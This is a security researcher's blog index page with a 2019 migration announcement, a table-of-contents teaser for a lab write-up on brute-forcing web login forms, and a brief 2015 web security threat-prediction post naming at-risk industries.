Rant from The Past & the Present Updates – 2019

2016

2017

2018

2019 ..

Alright, back to the desk again from the past.

I had been busy a quite sometime now & had to make various research available for references. I had pulled up https://pwntoken.github.io for this very reason & however it now seems tremendous efforts to maintain the platform (Octopress) as most of the developers have left support.

Having pointed that out – I’ve decided to migrate all my research posts along with trying to fix the images where required to wordpress platform & continue maintaining this space. It’s been a jerky ride & all the posts from the past had been recorded solely for own tracking & references – however this could be useful to rest of the content assessors.

It’s 2019! A whole-lot has been at desk to record & put across the table. The blog shall no more contain any references to personal academic records – However I plan to record security research content along with migration which should be possible after alot of efforts invested with fixing missing images, hyperlinks, etc.  Year 2019 & prior where I left over had seen more of security landscape changes, shift-left approaches & a ton of interesting security techniques to cover including & not limited to:

  1. Agile Based Application Security
  2. IoT Security being pushed to the Edge
  3. Salesforce Penetration Testing
  4. Sharepoint Security Testing
  5. IPTV Security Assessments
  6. New Security Attack vectors

Since, security in itself has a wide coverage & has various inter-related domains – I shall be able to retain Application Security content as of present while I work on the rest & phase them out for releases.

Other transforms:
  1. A new visibility – I intend to make the blog easier for reference purposes with few glitches to be fixed.
  2. Optimized experience for commentators & response time to questions-asked.
  3. Probably I shall also try including polls to certain posts which requires opinions.
  4. Active blogging on security research content & day-to-day (or weekly) on new learning front.

I look forward to yet continue with the content as I intend to track all my records & that should entirely be point of the blog.

Readers are welcome to use the content with prior consent & due-credits where required.

- Shritam Bhowmick
Application Security Research (http://www.pwntoken.github.io/)
                              (http://www.pwntoken.wordpress.com/)
Advertisements

Breaking the Application with Shritam Bhowmick – Application Bruteforce Demystified.

Web Form Brute Force Methods

Demonstration by Shritam Bhowmick
Web Application Penetration Tester
Independent Consulting Security Evangelist

Abstract

This is web application penetration testing challenges hosted over pentesteracademylab.appspot.com, it reflects several challenges for web application security researchers to break in a safe environment. This is for Lab practice only and no part of this document were provided by the original authors. Having to pull out my old research on application security, I thought to give back to the community but not all releases are meant to be pushed here. This research is part of my private application security research and proudly serves as an opening opportunities for others to dwell and work further on the same as provided and as long as the original authors are credited.

Contents

Hack.
Method 1: Using Hydra to Brute Force Web Logins
Method 2: Using Burp Suite Intruder to Brute Force Web Logins

Method 3: Using Python to break Web-Form Login
Method 4: Using WebSlayer to Brute Force Web Logins
Method 5: Nmap Script Code to break web form
Contact Information.

Continue reading

Web Security Threat Prediction

Web Security Threat Prediction

By Shritam Bhowmick
Web Application Penetration Tester
LinkedIn: https://www.linkedin.com/profile/view?id=281014248&trk=nav_responsive_tab_profile
Academia: https://independent.academia.edu/ShritamBhowmick
Facebook: https://www.facebook.com/coded32

Abstract

The Web Security scene has been much complex than ever known and its time various industry take a deeper look to it to gain an in-depth gravity of the situation which affects them directly or in-directly. This could come at a blow and wouldn’t let you know until it’s too late. This post will take you mind blown from the recent predictions in terms of Web Security and will let you inform on the latest web attacks in rise and how such attacks are bad for business as well as reputation let alone financial losses. When we talk about industry, this doesn’t have to be the retail industry; it aims at stretch from the medical appliances to the car manufacturing industry and too low down to the Electronic Cigarette industry. That been said, we will look how various industrial assets which have had their presence and continue to have a presence in the web world affects them directly or indirectly and why Web Security for them is an absolute important factor too big a risk to ignore and compromise with the same.

Prediction 2015

I have come across and defined a statistical background check on as many application attack vectors and evidently from the statistical approach have come up to a very conclusive set of industries which could go bankruptcy as well as reputation loss if Web Security part is ignored. Here we have thrown out some of the industries which have a direct impact on business ignoring Web Security at their end.

  • Medical Department
  • Web Retail Department and Business Assets
  • Opensource Platforms
  • Mobile Devices

1ta

Continue reading